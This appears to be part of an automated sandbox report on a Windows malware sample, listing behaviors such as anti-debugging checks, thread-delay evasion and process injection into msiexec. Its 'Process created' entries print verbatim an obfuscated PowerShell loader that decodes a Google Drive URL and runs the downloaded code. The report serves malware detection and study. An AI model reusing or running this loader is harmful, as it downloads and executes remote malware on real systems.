              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5566Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4312Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6878Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2725Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5016Thread sleep time: -4611686018427385s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1144Thread sleep time: -1844674407370954s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: msiexec.exe, 00000008.00000002.2452849140.000000000467A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWx
              Source: msiexec.exe, 00000008.00000002.2452849140.00000000046D7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: powershell.exe, 00000001.00000002.2068875852.000001E500062000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll#
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPortJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess queried: DebugPortJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_07496B68 LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,6_2_07496B68

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Yara detected Powershell download and execute
              Source: Yara matchFile source: amsi64_3020.amsi.csv, type: OTHER
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3020, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5728, type: MEMORYSTR
              Writes to foreign memory regions
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\msiexec.exe base: 3A60000Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\msiexec.exe base: 259FAB8Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#ubekendt Ninety Drmaatters #>;$Autoradiogramme='Stivningernes84';<#Prolonging Fibromets Verbigerative #>;$omphacite=$host.PrivateData;If ($omphacite) {$Okolehao++;}function Kolonnetypernes($aldis){$aneurin=$Drawbeam+$aldis.Length-$Okolehao;for( $Nonnormalness=5;$Nonnormalness -lt $aneurin;$Nonnormalness+=6){$Befolkningsgruppernes+=$aldis[$Nonnormalness];}$Befolkningsgruppernes;}function Sibs($Venezuelaneren){ & ($Dkstolens70) ($Venezuelaneren);}$dyingness=Kolonnetypernes 'Prom MBengtoTs bazMejeniPowwolUnc.al ettaaDurst/s,ide5Beskr.Trian0Sejrs Go f(AntepWOplseiDueurnProgrdUge aoDorsow BekrsRe ta OperaN UngdT pest Incit1Mic e0Elect.F den0Indvi;Semin ModstWVid iiF rfrn oste6L ftt4 Hy,d;Prana Photx Term6Udski4Ru id;Han s Ve jurCry,ev Kryd:b.vge1.mbry2sekst1,arad.,enry0Halmk)Breve PoelsGBe,raeStoddc Ko skRemedo Azte/Panto2Kroku0Be.be1 orle0Overg0foll.1Fjert0Ubrug1 Unba grsenF aceti Overr onaeAlgerfSub,noSlagkxAban /India1Nglep2Preob1Fulge.,etai0Staff ';$Originalfabrikken=Kolonnetypernes 'Ful ku ngueSboligeThickrSyna -SakraaSt,aagParage rapnIndskTNo,pa ';$Aphagia=Kolonnetypernes 'kara,hTvelytvarict IdeapVausys Gui :Lunch/Grans/Kitchd ,agnr PeriiG ngbvStopheFluor.A ecdgTariro Slu oOxalig Formltyphle Ho t. DanscOrgano elvbmHipli/Ev ntuHumanc unbl?KondeeKntrexMargupinteroGenrerLinjetJudge=DividdObtruoProt wFj rdnNedsal TrusoSpildaPal idJogge&F erniStrafdPrees=s.wbw1Tenni2 T,lblCoa,jzFogedUTi,syxExiteLL itnYAregeyStj rsS utanNightAA rikH OutsgPlade1 stvl2 katunitr ORu.otMSpineX owsnbTotal7Bughuut ngsESang y MisgO .amdaK ediJTotalCTangaA OvntNUnhorHPengeHAlkal ';$melaena=Kolonnetypernes ' ra l> .epo ';$Dkstolens70=Kolonnetypernes 'MarguI ShineUndelXAtoni ';$Paddehat='Culturises';$Helbredsundersoegelse='\Kanalseparationen.Gte';Sibs (Kolonnetypernes ' pee$ Agamg LagrlH.drooR ccybLgenpaSpermlAquaf:StatiT elevoTubatrHybris tieriYd.rlo BrennAktivsLydreasan efUnobsf Drjej.ombaeRect d skolrtrffei Ti.gn.angegSml re Guddn,rssa= Band$ S.reeA,parnMicasvBif.n:BaungaShi,lpH plopSongld TricaSlagbt eanaAstro+Carpi$Mell,HSo taeSqui l ForsbKla rr ylevePraecdJakiesDjvleuSennenFicindProtoeInsa rPrim,sS ldeoDegreeWleccg UdpieAi,bilind ssLittleSnobs ');Sibs (Kolonnetypernes 'Beska$Subspg Egoil rochoEk,tebAssora .ortlPint :A droKgidserRe evaSymphmTelefmMic.oe PyronVaretdL bane Flde=H nga$Jell ADemurpLogichT eera InergSttteiSpiriaPolys..ntagsheedhpArvealTr boiHjesttBe nd(Addit$M uthmomklaeFintelAgilma TetreFortan Mecha Dyre) T er ');Sibs (Kolonnetypernes ' .all[ DataNCykrmeG,nert Fib .SvrmeSStr be Sutlr ,armvHududiUdmalcKopule.lycgPTr inoFastiiCanonnForsttBrac.M BrydaContrnM teraEcholgNonadeSc rirYells]Whitt:Downc:AnkomSDojigeBist cChioluStatsrWeddii SpdbtNonsey,pkkePkontrr Spu oHegnstPro,roRaketcG.ngeoTempul.loug Burre=Outwi Vele [SejltNAvahieKommutIsopy.DatamSsv,neeSvindcMundau Cr mr Se si SubptAfvigyMtlooPOmnibrRun koFieultF mdooBjrnecAphidoLumbelTrkJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "<#ubekendt ninety drmaatters #>;$autoradiogramme='stivningernes84';<#prolonging fibromets verbigerative #>;$omphacite=$host.privatedata;if ($omphacite) {$okolehao++;}function kolonnetypernes($aldis){$aneurin=$drawbeam+$aldis.length-$okolehao;for( $nonnormalness=5;$nonnormalness -lt $aneurin;$nonnormalness+=6){$befolkningsgruppernes+=$aldis[$nonnormalness];}$befolkningsgruppernes;}function sibs($venezuelaneren){ & ($dkstolens70) ($venezuelaneren);}$dyingness=kolonnetypernes 'prom mbengtots bazmejenipowwolunc.al ettaadurst/s,ide5beskr.trian0sejrs go f(antepwoplseidueurnprogrduge aodorsow bekrsre ta operan ungdt pest incit1mic e0elect.f den0indvi;semin modstwvid iif rfrn oste6l ftt4 hy,d;prana photx term6udski4ru id;han s ve jurcry,ev kryd:b.vge1.mbry2sekst1,arad.,enry0halmk)breve poelsgbe,raestoddc ko skremedo azte/panto2kroku0be.be1 orle0overg0foll.1fjert0ubrug1 unba grsenf aceti overr onaealgerfsub,noslagkxaban /india1nglep2preob1fulge.,etai0staff ';$originalfabrikken=kolonnetypernes 'ful ku nguesboligethickrsyna -sakraast,aagparage rapnindsktno,pa ';$aphagia=kolonnetypernes 'kara,htvelytvarict ideapvausys gui :lunch/grans/kitchd ,agnr periig ngbvstophefluor.a ecdgtariro slu ooxalig formltyphle ho t. danscorgano elvbmhipli/ev ntuhumanc unbl?kondeekntrexmargupinterogenrerlinjetjudge=dividdobtruoprot wfj rdnnedsal trusospildapal idjogge&f ernistrafdprees=s.wbw1tenni2 t,lblcoa,jzfogeduti,syxexitell itnyaregeystj rss utannightaa rikh outsgplade1 stvl2 katunitr oru.otmspinex owsnbtotal7bughuut ngsesang y misgo .amdak edijtotalctangaa ovntnunhorhpengehalkal ';$melaena=kolonnetypernes ' ra l> .epo ';$dkstolens70=kolonnetypernes 'margui shineundelxatoni ';$paddehat='culturises';$helbredsundersoegelse='\kanalseparationen.gte';sibs (kolonnetypernes ' pee$ agamg lagrlh.droor ccyblgenpaspermlaquaf:statit elevotubatrhybris tieriyd.rlo brennaktivslydreasan efunobsf drjej.ombaerect d skolrtrffei ti.gn.angegsml re guddn,rssa= band$ s.reea,parnmicasvbif.n:baungashi,lph plopsongld tricaslagbt eanaastro+carpi$mell,hso taesqui l forsbkla rr ylevepraecdjakiesdjvleusennenficindprotoeinsa rprim,ss ldeodegreewleccg udpieai,bilind sslittlesnobs ');sibs (kolonnetypernes 'beska$subspg egoil rochoek,tebassora .ortlpint :a drokgidserre evasymphmtelefmmic.oe pyronvaretdl bane flde=h nga$jell ademurplogicht eera inergsttteispiriapolys..ntagsheedhparvealtr boihjesttbe nd(addit$m uthmomklaefintelagilma tetrefortan mecha dyre) t er ');sibs (kolonnetypernes ' .all[ datancykrmeg,nert fib .svrmesstr be sutlr ,armvhududiudmalckopule.lycgptr inofastiicanonnforsttbrac.m brydacontrnm teraecholgnonadesc riryells]whitt:downc:ankomsdojigebist cchiolustatsrweddii spdbtnonsey,pkkepkontrr spu ohegnstpro,roraketcg.ngeotempul.loug burre=outwi vele [sejltnavahiekommutisopy.datamssv,neesvindcmundau cr mr se si subptafvigymtloopomnibrrun kofieultf mdoobjrnecaphidolumbeltrk
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "<#ubekendt ninety drmaatters #>;$autoradiogramme='stivningernes84';<#prolonging fibromets verbigerative #>;$omphacite=$host.privatedata;if ($omphacite) {$okolehao++;}function kolonnetypernes($aldis){$aneurin=$drawbeam+$aldis.length-$okolehao;for( $nonnormalness=5;$nonnormalness -lt $aneurin;$nonnormalness+=6){$befolkningsgruppernes+=$aldis[$nonnormalness];}$befolkningsgruppernes;}function sibs($venezuelaneren){ & ($dkstolens70) ($venezuelaneren);}$dyingness=kolonnetypernes 'prom mbengtots bazmejenipowwolunc.al ettaadurst/s,ide5beskr.trian0sejrs go f(antepwoplseidueurnprogrduge aodorsow bekrsre ta operan ungdt pest incit1mic e0elect.f den0indvi;semin modstwvid iif rfrn oste6l ftt4 hy,d;prana photx term6udski4ru id;han s ve jurcry,ev kryd:b.vge1.mbry2sekst1,arad.,enry0halmk)breve poelsgbe,raestoddc ko skremedo azte/panto2kroku0be.be1 orle0overg0foll.1fjert0ubrug1 unba grsenf aceti overr onaealgerfsub,noslagkxaban /india1nglep2preob1fulge.,etai0staff ';$originalfabrikken=kolonnetypernes 'ful ku nguesboligethickrsyna -sakraast,aagparage rapnindsktno,pa ';$aphagia=kolonnetypernes 'kara,htvelytvarict ideapvausys gui :lunch/grans/kitchd ,agnr periig ngbvstophefluor.a ecdgtariro slu ooxalig formltyphle ho t. danscorgano elvbmhipli/ev ntuhumanc unbl?kondeekntrexmargupinterogenrerlinjetjudge=dividdobtruoprot wfj rdnnedsal trusospildapal idjogge&f ernistrafdprees=s.wbw1tenni2 t,lblcoa,jzfogeduti,syxexitell itnyaregeystj rss utannightaa rikh outsgplade1 stvl2 katunitr oru.otmspinex owsnbtotal7bughuut ngsesang y misgo .amdak edijtotalctangaa ovntnunhorhpengehalkal ';$melaena=kolonnetypernes ' ra l> .epo ';$dkstolens70=kolonnetypernes 'margui shineundelxatoni ';$paddehat='culturises';$helbredsundersoegelse='\kanalseparationen.gte';sibs (kolonnetypernes ' pee$ agamg lagrlh.droor ccyblgenpaspermlaquaf:statit elevotubatrhybris tieriyd.rlo brennaktivslydreasan efunobsf drjej.ombaerect d skolrtrffei ti.gn.angegsml re guddn,rssa= band$ s.reea,parnmicasvbif.n:baungashi,lph plopsongld tricaslagbt eanaastro+carpi$mell,hso taesqui l forsbkla rr ylevepraecdjakiesdjvleusennenficindprotoeinsa rprim,ss ldeodegreewleccg udpieai,bilind sslittlesnobs ');sibs (kolonnetypernes 'beska$subspg egoil rochoek,tebassora .ortlpint :a drokgidserre evasymphmtelefmmic.oe pyronvaretdl bane flde=h nga$jell ademurplogicht eera inergsttteispiriapolys..ntagsheedhparvealtr boihjesttbe nd(addit$m uthmomklaefintelagilma tetrefortan mecha dyre) t er ');sibs (kolonnetypernes ' .all[ datancykrmeg,nert fib .svrmesstr be sutlr ,armvhududiudmalckopule.lycgptr inofastiicanonnforsttbrac.m brydacontrnm teraecholgnonadesc riryells]whitt:downc:ankomsdojigebist cchiolustatsrweddii spdbtnonsey,pkkepkontrr spu ohegnstpro,roraketcg.ngeotempul.loug burre=outwi vele [sejltnavahiekommutisopy.datamssv,neesvindcmundau cr mr se si subptafvigymtloopomnibrrun kofieultf mdoobjrnecaphidolumbeltrk
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "<#ubekendt ninety drmaatters #>;$autoradiogramme='stivningernes84';<#prolonging fibromets verbigerative #>;$omphacite=$host.privatedata;if ($omphacite) {$okolehao++;}function kolonnetypernes($aldis){$aneurin=$drawbeam+$aldis.length-$okolehao;for( $nonnormalness=5;$nonnormalness -lt $aneurin;$nonnormalness+=6){$befolkningsgruppernes+=$aldis[$nonnormalness];}$befolkningsgruppernes;}function sibs($venezuelaneren){ & ($dkstolens70) ($venezuelaneren);}$dyingness=kolonnetypernes 'prom mbengtots bazmejenipowwolunc.al ettaadurst/s,ide5beskr.trian0sejrs go f(antepwoplseidueurnprogrduge aodorsow bekrsre ta operan ungdt pest incit1mic e0elect.f den0indvi;semin modstwvid iif rfrn oste6l ftt4 hy,d;prana photx term6udski4ru id;han s ve jurcry,ev kryd:b.vge1.mbry2sekst1,arad.,enry0halmk)breve poelsgbe,raestoddc ko skremedo azte/panto2kroku0be.be1 orle0overg0foll.1fjert0ubrug1 unba grsenf aceti overr onaealgerfsub,noslagkxaban /india1nglep2preob1fulge.,etai0staff ';$originalfabrikken=kolonnetypernes 'ful ku nguesboligethickrsyna -sakraast,aagparage rapnindsktno,pa ';$aphagia=kolonnetypernes 'kara,htvelytvarict ideapvausys gui :lunch/grans/kitchd ,agnr periig ngbvstophefluor.a ecdgtariro slu ooxalig formltyphle ho t. danscorgano elvbmhipli/ev ntuhumanc unbl?kondeekntrexmargupinterogenrerlinjetjudge=dividdobtruoprot wfj rdnnedsal trusospildapal idjogge&f ernistrafdprees=s.wbw1tenni2 t,lblcoa,jzfogeduti,syxexitell itnyaregeystj rss utannightaa rikh outsgplade1 stvl2 katunitr oru.otmspinex owsnbtotal7bughuut ngsesang y misgo .amdak edijtotalctangaa ovntnunhorhpengehalkal ';$melaena=kolonnetypernes ' ra l> .epo ';$dkstolens70=kolonnetypernes 'margui shineundelxatoni ';$paddehat='culturises';$helbredsundersoegelse='\kanalseparationen.gte';sibs (kolonnetypernes ' pee$ agamg lagrlh.droor ccyblgenpaspermlaquaf:statit elevotubatrhybris tieriyd.rlo brennaktivslydreasan efunobsf drjej.ombaerect d skolrtrffei ti.gn.angegsml re guddn,rssa= band$ s.reea,parnmicasvbif.n:baungashi,lph plopsongld tricaslagbt eanaastro+carpi$mell,hso taesqui l forsbkla rr ylevepraecdjakiesdjvleusennenficindprotoeinsa rprim,ss 